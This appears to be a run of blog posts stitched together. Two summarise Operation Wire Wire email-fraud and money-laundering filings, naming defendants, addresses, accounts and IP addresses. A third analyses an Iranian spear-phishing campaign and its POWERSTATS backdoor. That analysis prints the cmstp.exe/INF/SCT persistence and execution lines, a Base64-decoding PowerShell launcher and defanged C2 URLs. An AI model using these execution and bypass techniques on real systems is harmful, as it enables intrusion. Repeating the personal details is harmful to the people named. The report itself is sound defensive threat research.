After a few successful jobs, the suspect said that Armona told him he could earn extra money by recruiting others into the scam.  He agreed to allow the USSS to record his emails, phone calls, and any text or WhatsApp communications involving others in the scheme.

The Ortega Case 

Although Bryant is not credited with recruiting Natalie Armona, the two are Facebook friends.  Bryant's profile also suggests that he may have had access to Personal Information, as an agent at a Health Insurance organization.  His cover photo indicates he's a fan of money!


The same USSS agent who did Armona's case also swore out the affidavit of criminal complaint against Bryant Ortega.  Ortega opened a TD Bank account for his new corporation, Bryant Tech Deals, which matched his home address of 2160 NW 111 Avenue, Sunrise, Florida 33322.  Bryant Tech Deals also opened a SunTrust account.  Both accounts were opened on February 13, 2017 and on March 6, 2017 the SunTrust account received an inbound wire of $283,750.50.  On March 7th, three withdrawals were made.  $500 from an ATM, $5600 over-the-counter, and $8400, also over-the-counter.  Ortega's true Florida drivers license was shown as proof of identify for the in-person withdrawals. Also on March 7, 2017, $94,110 was wired to "Huge Elite Limited" in Shanghai, China. After paying himself three more times the following day ($400 ATM, $800 at the counter, and $6200 at the counter), another wire of $128,705 went to Huge Elite Limited.  On March 9, 2017, an additional  $33,000 was wired out to "Lofty Ease Limited" in Shanghai, China.
(Ortega was arrested Jan 25, 2018)

The Pereira Case 

The third case, Feb 23, 2018, has an affidavit from Miami's FBI office from an agent who previously served as a Computer Scientist in the Philadelphia office! Pereira ran several schemes against companies by impersonating their officers, including Fakhoury Law Group (Troy, Michigan), High Tech Lending (San Diego, California), Gaumer Company (Houston, Texas), Park Corporation (Cleveland, Ohio), and Zija International (Lehi, Utah.)  Each of those companies received fraudulent emails, claiming to be from an executive of their own company, ordering that wires be sent to accounts controlled by "OS Fly Tech Incorporated."   Pereira hired an unnamed middle man to set up additional corporate accounts at Bank of America, Wells Fargo, SunTrust Bank, and Regions Bank.  The Middleman says that Pereira was working with an unknown male who he called "Rezi."  This would be the same person that Cynthia Rodriguez was working for (see Operation Wire Wire: The South Florida Cases, Part 1) Roda Taher.  Pereira and Rezi gave one of their mules an email os20technologies@gmail.com to use.


As shown above, nearly $1M in wires were sent to company accounts at Bank of America, SunTrust Bank,  TD Bank, and Wells Fargo Bank in September and October of 2016.  Pereira and his middleman communicated through WhatsApp and Email.  (954.554.5501 / bossmanweston@gmail.com / osflytechnologies@gmail.com )

The Big Picture 

Roda Taher, AKA Ressi, AKA Rezi, was the manager and supervisor of a criminal organization in the Southern District of Florida and elsewhere.  He recruited all of the defendants in this case, encouraged them to open shell accounts and receive illegally transferred funds, some of which they directly wired to China, Poland, and elsewhere.

The case involves 30 distinct financial transactions:
CountDateDefendantTransaction
202SEP2016Eliot Pereira$89,630 from OS Fly Tech's Wells Fargo account to China
330NOV2016Melissa Rios$13,844 from Tiahan Fiberoptics Inc's TD Bank account to Huzhou Nanmei Textile
423DEC2016Natalie Armona$288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
423DEC2016Natalie Armona$194,110 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
523DEC2016Natalie Armona$288,301 from Armona Furniture's TD Bank account to Caplan Sp Zoo in Warszawa Poland
623DEC2016Natalie Armona$94,218 from Armona Furniture's TD Bank account to Baolifeng Intl. Trading Limited in Shenzhen China
712JAN2017Natalie Armona$44,618 from Armona Furniture's TD Bank account to Hangzhou Jieenda Textile Co Ltd in China
807MAR2017Bryant Ortega$94,110 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
908MAR2017Bryant Ortega$128,705 from Bryant Tech Deal's SunTrust account to Huge Elite Limited in Shanghai, China
1008MAR2017Bryant Ortega$6,200 from Bryant Tech Deal's SunTrust account
1128MAR2017Bryant Ortega$179,302 from Bryant Tech Deal's SunTrust account to Lofty Ease Limited in Shanghai, China
1214APR2017Roberto Carlos Garcia$3,500 from RCG Deals Inc's Bank of America account
1317APR2017Roberto Carlos Garcia$112,000 from RCG Deals Inc's Bank of America account to KT and G Corp
1417APR2017Roberto Carlos Garcia$7,000 from RCG Deals Inc's Bank of America account
1517APR2017Roberto Carlos Garcia$3,000 from RCG Deals Inc's Bank of America account
1628APR2017Jennifer Ruiz$39,841 from Josette Quality Inc's TD Bank account to Huzhou Nanmei Textile Co. Ltd.
1728APR2017Jennifer Ruiz$3,400 from Josette Quality Inc's TD Bank account
1804MAY2017Roberto Carlos Garcia$100 from RCG Deals Inc's Bank of America account
1926OCT2017Angelo Santa Cruz$88,950 from ASC Worldwide's Chase Bank account to Niche Holding Ltd.
2026OCT2017Angelo Santa Cruz$7,000 from ASC Worldwide's Chase Bank account
2101NOV2017Alexis Fernandez Cruz$8,600 from Alexis Universal Inc's TD Bank account
2207NOV2017Angelo Santa Cruz$96,500 from ASC Worldwide's TD Bank account to Zhejiang Oudi Machine Co. Ltd.
2307NOV2017Angelo Santa Cruz$8,500 from ASC Worldwide's TD Bank account
2409NOV2017Alexis Fernandez Cruz$8,500 from Alexis Universal Inc's SunTrust Bank account
2521NOV2017Yirielkys Pacheco Fernandez$34,810 from YF Nationwide Inc's Chase Bank account to Nantong Gomaa International Co. Ltd.
2606DEC2017Yirielkys Pacheco Fernandez$88,528 from YF Nationwide Inc's Chase Bank account
2730NOV2017Jose E. Rivera$54,210 from Rivera Worldwide Inc's Bank of America account to Zhejiang Senhuang Trading in Zhejiang, China
2830NOV2017Jose E. Rivera$6,100 from Rivera Worldwide Inc's Bank of America account
2903JAN2018Angeles De Jesus Angulo$79,400 from Angeles Premier Trades Inc's Wells Fargo Bank account to Farstar International Ltd
3003JAN2018Angeles De Jesus Angulo$8,600 from Angeles Premier Trades Inc's Wells Fargo Bank account

Altogether, this group is charged with laundering more than $5,000,000.

The case is scheduled to be heard in Jury Trial beginning on June 25, 2018 before Judge Marcia G. Cooke in Miami, Florida.

Tomorrow (June 13, 2018) two of the defendants are meeting to change their plea.  Jennifer Ruiz and Yirielkys Pacheco Fernandez have decided they may not want the 20 year sentence that all of them are facing as part of a conspiracy to commit money laundering at this level!

Operation Wire Wire: The South Florida Cases, Part 1

Yesterday we started a series of posts about Operation Wire Wire, where the Department of Justice announced charges against 74 people for Business Email Compromise and related scams.

The South Florida cases are so huge, we're actually going to break them into three parts as well.  In part one, we'll look at the case against Cynthia Rodriguez, Destiny Asjee Rowland, and Lourdes Washington.


Defendant #1: Cynthia Rodriguez:
18:1349.F Conspiracy to Commit Wire Fraud
18:1956-3300.F Conspiracy to Commit Money Laundering
18:1956-3300.F Money Laundering and Forfeiture Count

Defendant #2: Destiny Asjee Rowland
18:1343 Wire Fraud
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956 Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

Defendant #3: Lourdes Washington
18:1349 Conspiracy to Commit Wire Fraud
18:1956(h) Conspiracy to Commit Money Laundering
18:1956(a)(1)(B)(i) Money Laundering

According to the indictment against Destiny Asjee Rowland, Rowland incorporated "Asjee Luxury Inc" in July 2017 and claimed to be a furniture merchant wholesaler at 3688 NW 83rd Lane in Sunrise, Florida.  The victim companies in her case were a company in Eau Claire, Wisconsin, a lumber company in Illinois, and an escrow company in Roseville, California that was selling property for two people called "KW" and "TW" in the indictment.

Asjee Luxury opened accounts at TD Bank and SunTrust Bank.  Using other people's names and email addresses, she convinced companies to transfer money to her account, including by falsely claiming to be the lumber company, where she sent "urgent audit" notices to the Wisconsin company demanding immediate wire transfers of payments owed to the lumber company.  That email came from an IP address in Nigeria on July 27, 2017.  By July 28th, a Bank of America account in Wisconsin had sent $1,651,699 to her TD Bank account in Florida.

 She also caused the escrow company to redirect payments intended for their clients KW and TW to accounts she controlled, receiving $451,759 from a City National Bank account in California into her SunTrust Bank account in Florida on July 31, 2017.

Cynthia Rodriguez and Loudes Washington have a ten page criminal complaint written by a US Secret Service agent to describe their case.  Washington created a new business, LW Nationwide Inc, at 9561 Fountainebleau Blvd, Apartment 402, Miami, Florida 33172, which coincidentally is also his driver's license address.  Then he opened a Bank of America account in that name.

A Real Estate attorney, BD, was handling the closing on several pieces of property.  On Feb 14, 2017, he receives an email from ***@themarstongroup.com informing him that he would receive a check for $37,225 via registered mail, along with a 1099 tax form.  The next day, an email from the same name ***@gmx.us said that he was leaving town unexpectedly and needed the funds sent via wire transfer instead.  Those funds were then directed to the BofA account of LW Nationwide.  Those funds were immediately RE-wired to a bank account in Zhejiang, China.  The same day, Washington withdrew funds from an ATM in Hialeah, Florida.  Three minutes later, at the same ATM machine, Cynthia Rodriguez withdrew funds from the LW Nationwide account, using the same debit card as Washington.   Bank of America's logs reveal that an IP address, 50.143.68.4 was used to access the account.  That IP address was Rodriguez's home Comcast Cable account at 2914 Funston Street, in Hollywood, Florida.  Rodriguez made additional withdrawals from the account, including from a drivethrough ATM whose cameras captured the license plate of her Nissan Quest, 520-TML, registered to Rodriguez.

Washington was later arrested (December 2017) as a result of an open warrant in Kentucky, and testified to opening the accounts, making the wire transfers, and doing the cash withdrawals "at the behest of her recruiter/manager" who she did not identify.

Meanwhile, the Eu Claire, Wisconsin business contacted the US Secret Service about the scam involving the fake invoices from the lumber company.   Records from the state of Florida revealed that Asjee Luxury only had one officer, and one signatory on their bank accounts. What seems to be a cooperating witness (Individual 1) in that case revealed that Rodriguez had recruited them to open several sham business accounts, including the TD Bank account belonging to Asjee Luxury!  Shortly after the California real estate company wired money into that account, ATM video footage showed Individual 1 withdrawing $8,000 cash from the account.  Individual 1 would then give half of the money to Rodriguez and keep the other half.  Individual 1 also opened a shell company called Wide Assure Trades Inc and a corresponding Bank of America account.

On October 27, 2017, Rodriguez notified Individual 1 that Wide Assure Trades was going to receive some money.  That account was logged into the same day from 76.18.27.6, the IP address that Comcast listed for Rodriguez's home address at 2914 Funston Street, Hollywood Florida at that time.  (DHCP addresses change from time to time.)

Later an additional document, not an indictment, but rather "Superseding Information" was filed



The Superseding Information reveals that Cynthia Rodriguez had incorporated "CR Elegant Trades" in September 2014 from her home address in Hialeah, Florida.  We already spoke of Washington's company, LW Nationwide, and Rowland's company, Asjee Luxury.  The superseding information speaks of (but does not give many details) an ongoing conspiracy from 2014 until 2018 that involved the creation of many shell companies and many fraudulent wire transfers. 

"It was the purpose of the conspiracy for the defendants and their co-conspirators to unlawfully enrich themselves by obtaining and misappropriating money from victims, by making materially false and fraudulent representations, and by the concealment of material facts, concerning, among other things, the true identify of the defendants and their co-conspirators and the purported need for victims to make payments to the defendants and their co-conspirators."

Lourdes Washington entered a plea agreement that included the fact that she may face 20 years in prison, 3 years supervised release, and a fine of $250,000 or double the pecuniary gain, as well as restitution, and acknowledging that they may be "denaturalized and removed" as a result of their crimes.  In other words, Washington had a public defender, as the only funds they tie to her are $37,225.  (It will be interesting to see what actually happens at sentencing on July 9, 2018.)

Cynthia Rodriguez also plead guilty, but in her case, she named her recruiter.  In the plea agreement, she agrees that she and her co-conspirators opened shell corporations and bank accounts for the purpose of receiving proceeds of wire fraud scams in exchange for a percentage of profits.  But then she says she was recruited to the scam by Roda TAHER.  Taher, AKA Res, AKA Rezi, AKA Ressi, recruited Rodriguez initially as a money mule, but advanced her to being a sub-recruiter, working to hire and manage additional money mules in the South Florida area. Rodriguez was responsible for providing corporate documents for her mules' shell companies, driving the money mules to banks, or ordering them to open certain accounts at certain banks, and accompanying them to withdraw funds.  She also provided directions to money mules on how to hide their schemes from banks, law enforcement and other individuals.

Rodriguez's plea agreement states that she knew the money was coming from wire fraud, and that she knew that business email compromise and spear phishing scams were used, including email account takeovers and "spoofed" email accounts making the victims believe they were making wire transfers to trusted partners, but instead depositing the funds into the accounts of the fraudsters.  Rodriguez says that she used the phone application "WhatsApp" to exchange encrypted messages with co-conspirators, including Taher, in order to evade detection by law enforcement.  Her plea confesses to laundering at least $4,760,669.80 between herself and the mules she recruited.

Like Washington, Rodriguez's plea states that she may do 20 years plus 3 supervised, and pay a fine of $250,000 or double the pecuniary gain, plus restitution, and that she may face denaturalization and removal.

Base Offense level for Washington was 8.  Increased by 18 levls due to the amount of laundered funds being between $3.5M and $9.5M.  +3 because she was a manager or supervisor in a scheme involving 5 of more participants.  +2 because of 18USC1956, and +2 because of the "sophisticated nature" of the laundering.  So, a level 33 offense.  They only decreased her 3 levels for "demonstrating acceptance of responsibility and assisting authorities in the investigation".  So she is still facing a level 30 offense.

"Furthermore, the Defendant stipulates that she owes restitution in the amount of $4,760,669.80!"

The plea agreement was signed May 23, 2018.  Rodriguez will be sentenced on July 11, 2018.

In Operation Wire Wire: The South Florida Cases Part 2, we'll look at 18-CR-20170, with defendants Eliot Pereira, Natalie Armona, Bryant Ortega, Melissa Rios, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loyaza.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersio
   n\Run\"WindowsDefenderUpdater"
= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If command starts with “excel”, then it leverages DDEInitiate Method of Excel.Appilcation to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command

Purpose

reboot

Reboot the system using shutdown command

shutdown

Shut down the system using shutdown command

clean

Wipe the Drives, C:\, D:\, E:\, F:\

screenshot

Take a screenshot of the System

upload

Encrypt and upload the information from the system

excel

Leverage Excel.Application COM object for code execution

outlook

Leverage Outlook.Application COM object for code execution

risk

Leverage DCOM object for code execution

Conclusion

This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash

Filename

Targeted Region

eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894

na.doc

 

Pakistan

76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338

Invest in Turkey.doc

Turkey

6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac

güvenlik yönergesi. .doc

Turkey

009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0

idrbt.doc

 

India

18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6

Türkiye Cumhuriyeti Kimlik Kartı.doc

Turkey

3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb

Turkish Armed Forces.doc

 

Turkey

9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c

na.gov.pk.doc

 

Pakistan

3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115

MVD-FORM-1800.doc

Tajikistan

cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88

KEGM-CyberAttack.doc

Turkey

1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942

IL-1801.doc

Turkey

aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627

kiyiemniyeti.doc

Turkey

93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84

TCELL-S1-M.doc

Tajikistan

c87799cce6d65158da97aa31a5160a0a6b6dd5a89dea312604cc66ed5e976cc9

egm-1.doc

Turkey

2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13

Connectel .pk.doc

Pakistan

18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd

gßvenlik_yÜnergesi_.doc

Turkey

153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58

MIT.doc

Turkey

d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025

Gvenlik Ynergesi.doc

Turkey

af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102

Gvenlik Ynergesi.doc

Turkey

5550615affe077ddf66954edf132824e4f1fe16b3228e087942b0cad0721a6af

NA

Turkey

3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c

Anadolu Güneydoğu Projesinde .doc

Turkey

Network Indicators

List of Proxy URLs

hxxp://alessandrofoglino[.]com//db_template.php

hxxp://www.easy-home-sales[.]co.za//db_template.php

hxxp://www.almaarefut[.]com/admin/db_template.php

hxxp://chinamall[.]co.za//db_template.php

hxxp://amesoulcoaching[.]com//db_template.php

hxxp://www.antigonisworld[.]com/wp-includes/db_template.php

hxxps://anbinni.ba/wp-admin/db_template.php

hxxp://arctistrade[.]de/wp/db_template.php

hxxp://aianalytics[.]ie//db_template.php

hxxp://www.gilforsenate[.]com//db_template.php

hxxp://mgamule[.]co.za/oldweb/db_template.php

hxxp://chrisdejager-attorneys[.]co.za//db_template.php

hxxp://alfredocifuentes[.]com//db_template.php

hxxp://alxcorp[.]com//db_template.php

hxxps://www.aircafe24[.]com//db_template.php

hxxp://agencereferencement.be/wp-admin/db_template.php

hxxp://americanlegacies[.]org/webthed_ftw/db_template.php

hxxps://aloefly[.]net//db_template.php

hxxp://www.duotonedigital[.]co.za//db_template.php

hxxp://architectsinc[.]net//db_template.php

hxxp://www.tanati[.]co.za//db_template.php

hxxp://emware[.]co.za//db_template.php

hxxp://breastfeedingbra[.]co.za//db_template.php

hxxp://alhidayahfoundation[.]co[.]uk/category/db_template.php

hxxp://cashforyousa[.]co.za//db_template.php

hxxps://www.airporttaxi-uk[.]co[.]uk/wp-includes/db_template.php

hxxp://antjetaubert[.]de//db_template.php

hxxp://hesterwebber[.]co.za//db_template.php

hxxp://fickstarelectrical[.]co.za//db_template.php

hxxp://alex-frost[.]com/assets/db_template.php

hxxps://americanbrasil[.]com.br//db_template.php

hxxps://aileeshop[.]com//db_template.php

hxxps://annodle[.]com//db_template.php

hxxp://goldeninstitute[.]co.za/contents/db_template.php

hxxp://ednpk[.]com//db_template.php

hxxp://www.arabiccasinochoice[.]com//db_template.php

hxxp://proeventsports[.]co.za//db_template.php

hxxp://glenbridge[.]co.za//db_template.php

hxxp://berped[.]co.za//db_template.php

hxxp://best-digital-slr-cameras[.]com//db_template.php

hxxp://antonhirvonen[.]com/pengalandet.se/wp-includes/db_template.php

hxxp://www.alpacal[.]com//db_template.php

hxxps://www.alakml[.]com/wp-admin/db_template.php

hxxp://ar-rihla[.]com//db_template.php

hxxp://appsvoice[.]info//db_template.php

hxxp://www.bashancorp[.]co.za//db_template.php

hxxp://alexanderbecker[.]net/services/db_template.php

hxxp://visionclinic.co.ls/visionclinic/db_template.php

hxxps://www.angelesrevista[.]com//db_template.php

hxxps://www.antojoentucocina[.]com//db_template.php

hxxp://apollonweb[.]com//db_template.php

hxxps://www.alphapixa[.]com//db_template.php

hxxp://capitalradiopetition[.]co.za//db_template.php

hxxp://www.generictoners[.]co.za//db_template.php

hxxps://alnahdatraining[.]com//db_template.php

hxxps://albousala[.]com//db_template.php

hxxps://www.dopetroleum[.]com//db_template.php

hxxp://bios-chip[.]co.za//db_template.php

hxxp://www.crissamconsulting[.]co.za//db_template.php

hxxp://capriflower[.]co.za//db_template.php

hxxp://www.dingaanassociates[.]co.za//db_template.php

hxxp://indiba-africa[.]co.za//db_template.php

hxxp://verifiedseller[.]co.za/js/db_template.php

hxxps://www.buraqlubricant[.]com//db_template.php

hxxp://aqarco[.]com/wp-admin/db_template.php

hxxp://allaboutblockchain[.]net//db_template.php

hxxp://www.amexcars[.]info/tpl/db_template.php

hxxp://clandecor[.]co.za/rvsUtf8Backup/db_template.php

hxxp://bakron[.]co.za//db_template.php

hxxp://gsnconsulting[.]co.za//db_template.php

hxxp://vumavaluations[.]co.za//db_template.php

hxxp://heritagetravelmw[.]com//db_template.php

hxxp://ampvita[.]com//db_template.php

hxxp://ahero-resource-center[.]org/administrator/db_template.php

hxxps://arbulario[.]com//db_template.php

hxxp://havilahglo[.]co.za/wpscripts/db_template.php

hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/db_template.php

hxxp://delectronics[.]com[.]pk//db_template.php

hxxp://antucomp[.]com//db_template.php

hxxp://advocatetn[.]com/font-awesome/fonts/db_template.php

hxxps://amooy[.]com/webservice/db_template.php

hxxp://www.harmonyguesthouse[.]co.za//db_template.php

hxxp://alanrori[.]com//db_template.php

hxxp://algarvesup[.]com//db_template.php

hxxp://desirablehair[.]co.za//db_template.php

hxxp://comsip[.]org.mw//db_template.php

hxxp://jdcorporate[.]co.za/catalog/db_template.php

hxxp://andrewfinnburhoe[.]com//db_template.php

hxxp://anyeva[.]com/wp-includes/db_template.php

hxxp://www.agenceuhd[.]com//db_template.php

hxxp://host4unix[.]net/host24new/db_template.php

hxxp://www.altaica[.]ca/wordpress/db_template.php

hxxp://www.allbuyer[.]co[.]uk//db_template.php

hxxp://jvpsfunerals[.]co.za//db_template.php

hxxp://immaculatepainters[.]co.za//db_template.php

hxxp://tcpbereka[.]co.za/js/db_template.php

hxxp://clientcare.co.ls//db_template.php

hxxp://investaholdings[.]co.za/htc/db_template.php

hxxp://www.amjobs[.]co[.]uk//db_template.php

hxxp://www.agirlgonewine[.]com/store/db_template.php

hxxp://findinfo-more[.]com//db_template.php

hxxp://asgen[.]org//db_template.php

hxxp://alphasalesrecruitment[.]com//db_template.php

hxxp://irshadfoundation[.]co.za//db_template.php

hxxp://analternatif[.]com/includes/db_template.php

hxxp://arbruisseau[.]com/profiles/db_template.php

hxxp://ladiescircle[.]co.za//db_template.php

hxxp://all-reseller[.]com/zzz_backup/db_template.php

hxxp://alcatrazmoon[.]com/images/db_template.php

hxxp://www.alcalumni[.]com/wp-includes/db_template.php

hxxp://aniljoseph[.]com/servermon/db_template.php

hxxp://alwake3press[.]com/wp-includes/db_template.php

hxxp://www.hfhl[.]org.ls/habitat/db_template.php

hxxp://alcafricanos[.]com/slsmonographs/db_template.php

hxxps://agapeencounter[.]org//db_template.php

